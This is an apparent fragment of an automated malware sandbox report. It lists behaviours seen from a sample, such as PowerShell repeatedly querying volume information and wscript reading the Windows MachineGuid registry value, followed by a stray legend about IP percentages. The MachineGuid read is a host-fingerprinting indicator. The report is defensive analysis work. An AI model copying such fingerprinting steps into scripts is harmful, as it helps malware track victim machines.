Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs